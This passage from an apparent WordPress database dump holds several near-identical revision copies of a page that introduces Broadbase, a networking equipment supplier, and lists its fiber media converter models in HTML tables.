SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:08:45','2018-12-21 08:08:45','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2707,1,'2018-12-21 16:15:36','2018-12-21 08:15:36','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr >\r\n<td width=\"1\" style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-autosave-v1','','','2018-12-21 16:15:36','2018-12-21 08:15:36','',1943,'https://bintara.com.my/blog/2018/12/21/1943-autosave-v1/',0,'revision','',0),(2708,1,'2018-12-21 16:11:12','2018-12-21 08:11:12','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"500\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:11:12','2018-12-21 08:11:12','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2710,1,'2018-12-21 16:14:36','2018-12-21 08:14:36','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr width=\"1\">\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:14:36','2018-12-21 08:14:36','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2712,1,'2018-12-21 16:16:29','2018-12-21 08:16:29','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-21 16:16:29','2018-12-21 08:16:29','',1943,'https://bintara.com.my/blog/2018/12/21/1943-revision-v1/',0,'revision','',0),(2711,1,'2018-12-21 16:15:28','2018-12-21 08:15:28','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr >\r\n<td width=\"1\" style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM 